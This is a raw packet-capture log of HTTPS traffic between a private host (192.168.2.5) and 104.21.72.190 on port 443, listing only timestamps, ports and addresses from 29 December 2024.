Dec 29, 2024 09:23:15.894989014 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:15.895087004 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:15.896960974 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:15.897100925 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:15.899785995 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:15.900306940 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:15.965760946 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:15.965826988 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:15.965876102 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:15.965914011 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:15.968792915 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:15.968878031 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:16.059876919 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:16.059912920 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:16.059976101 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:16.059988022 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:16.060030937 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:16.060878038 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:16.060945034 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:16.064698935 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:16.064780951 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:16.064786911 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:16.064940929 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:16.065640926 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:16.065677881 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:16.068697929 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:16.068746090 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:16.069686890 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:16.069734097 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:16.074522018 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:16.074547052 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:16.074572086 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:16.074577093 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:16.074613094 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:16.080197096 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:16.080223083 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:16.080254078 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:16.080261946 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:16.080297947 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:16.083300114 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:16.083354950 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:16.203059912 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:16.203161001 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:16.442815065 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:16.442862034 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:16.442889929 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:16.442899942 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:16.442945004 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:16.442960978 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:16.442982912 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:16.443202019 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:16.443233013 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:16.443264008 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:16.443273067 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:16.443756104 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:16.444160938 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:16.444189072 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:16.444204092 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:16.444222927 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:16.444228888 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:16.444243908 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:16.444257021 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:16.444258928 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:16.444284916 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:16.444303989 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:16.444314003 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:16.445045948 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:16.445091963 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:16.445103884 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:16.445120096 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:16.445132017 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:16.445167065 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:16.446753025 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:16.446789026 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:16.446821928 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:16.446841955 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:16.446855068 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:16.446878910 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:16.446885109 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:16.446896076 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:16.446913004 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:16.446930885 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:16.446939945 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:16.446963072 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:16.447797060 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:16.447828054 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:16.447854042 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:16.447869062 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:16.447885990 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:16.448617935 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:16.448656082 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:16.448678017 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:16.448688984 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:16.448704958 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:16.449506998 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:16.449533939 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:16.449551105 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:16.449564934 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:16.449574947 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:16.449598074 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:16.450381994 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:16.450416088 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:16.450438976 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:16.450440884 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:16.450453043 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:16.450464964 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:16.450491905 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:16.451174974 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:16.451210976 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:16.451226950 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:16.451237917 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:16.451252937 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:16.452061892 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:16.452089071 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:16.452119112 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:16.452121973 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:16.452143908 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:16.452155113 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:16.452167988 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:16.462040901 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:16.462070942 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:16.462111950 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:16.462136030 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:16.462157965 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:16.463970900 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:16.464019060 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:16.464035034 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:16.468261957 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:16.468291998 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:16.468348980 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:16.468355894 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:16.468393087 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:16.471857071 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:16.471923113 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:16.473934889 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:16.473989010 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:16.474900961 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:16.474945068 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:16.479185104 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:16.479221106 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:16.479245901 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:16.479254007 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:16.479281902 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:16.479294062 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:16.479942083 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:16.479984999 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:16.481380939 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:16.481441975 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:16.487508059 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:16.487546921 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:16.487576962 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:16.487584114 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:16.487612963 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:16.487622023 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:16.490544081 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:16.490602970 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:16.490616083 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:16.493319035 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:16.493379116 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:16.493387938 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:16.493597031 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:16.499681950 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:16.499697924 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:16.499747992 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:16.499756098 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:16.499782085 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:16.499799013 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:16.570400000 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:16.570417881 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:16.570467949 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:16.570482969 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:16.570513010 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:16.570528984 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:16.662841082 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:16.662858963 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:16.662938118 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:16.662946939 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:16.662978888 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:16.668586016 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:16.668622017 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:16.668646097 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:16.668653965 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:16.668687105 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:16.670591116 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:16.670640945 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:16.670649052 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:16.670713902 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:16.674473047 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:16.674551964 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:16.674560070 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:16.678230047 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:16.678261995 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:16.678294897 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:16.678303957 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:16.678378105 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:16.680282116 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:16.680340052 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:16.683146000 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:16.683212996 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:16.685981989 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:16.686039925 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:16.687903881 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:16.687954903 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:16.688940048 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:16.688988924 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:16.693794012 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:16.693825960 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:16.693856001 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:16.693861961 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:16.693897009 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:16.699855089 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:16.699871063 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:16.699908972 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:16.699919939 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:16.699948072 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:16.750937939 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:16.771797895 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:16.771821976 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:16.771862030 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:16.771888018 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:16.771927118 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:16.771946907 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:16.776040077 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:16.776087046 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:16.776107073 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:16.776118040 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:16.776138067 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:16.816090107 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:16.863197088 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:16.863265038 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:16.869287014 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:16.869307995 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:16.869374990 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:16.869385958 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:16.869431973 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:16.875221968 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:16.875237942 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:16.875303030 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:16.875319958 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:16.875369072 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:16.875375986 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:16.880444050 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:16.880485058 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:16.880507946 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:16.880516052 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:16.880549908 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:16.886423111 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:16.886436939 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:16.886498928 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:16.886512995 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:16.891742945 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:16.891756058 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:16.891813040 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:16.891824007 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:16.898232937 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:16.898246050 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:16.898302078 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:16.898314953 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:16.898344040 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:16.902487993 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:16.902546883 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:16.902555943 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:16.902609110 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:16.973189116 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:16.973237038 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:16.973264933 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:16.973274946 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:16.973438025 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:16.977967978 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:16.978007078 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:16.978034019 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:16.978043079 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:16.978070974 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:17.032171011 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:17.064596891 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:17.064651966 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:17.070007086 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:17.070024014 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:17.070085049 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:17.070099115 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:17.070112944 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:17.070174932 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:17.076092958 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:17.076107025 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:17.076162100 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:17.076172113 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:17.076498985 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:17.081280947 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:17.081295013 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:17.081366062 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:17.081374884 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:17.081439972 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:17.087328911 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:17.087344885 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:17.087395906 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:17.087408066 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:17.087438107 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:17.087449074 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:17.088268995 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:17.088315010 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:17.090790033 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:17.090854883 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:17.091645956 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:17.091708899 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:17.093367100 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:17.093430996 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:17.099791050 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:17.099807024 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:17.099854946 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:17.099864006 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:17.099903107 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:17.099950075 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:17.099957943 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:17.100001097 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:17.101600885 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:17.101656914 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:17.104033947 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:17.104125977 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:17.175050974 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:17.175139904 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:17.177512884 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:17.177591085 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:17.179250002 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:17.179303885 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:17.266129017 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:17.266206980 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:17.271563053 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:17.271579981 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:17.271651983 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:17.271668911 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:17.271787882 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:17.276804924 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:17.276820898 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:17.276885986 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:17.276899099 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:17.277148008 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:17.282835007 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:17.282849073 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:17.282919884 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:17.282932043 CET	443	49709	104.21.72.190	192.168.2.5
